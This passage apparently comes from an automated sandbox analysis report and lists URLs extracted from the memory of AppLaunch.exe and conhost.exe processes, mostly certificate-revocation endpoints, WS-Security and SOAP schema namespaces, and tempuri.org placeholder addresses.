Source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://forms.rea
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: conhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmp String found in binary or memory: http://go.mic4m
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp String found in binary or memory: http://iptc.tc4xmp
Source: AppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmp String found in binary or memory: http://ns.ado/Identq
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.r
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.a
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735232254.000000000713C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
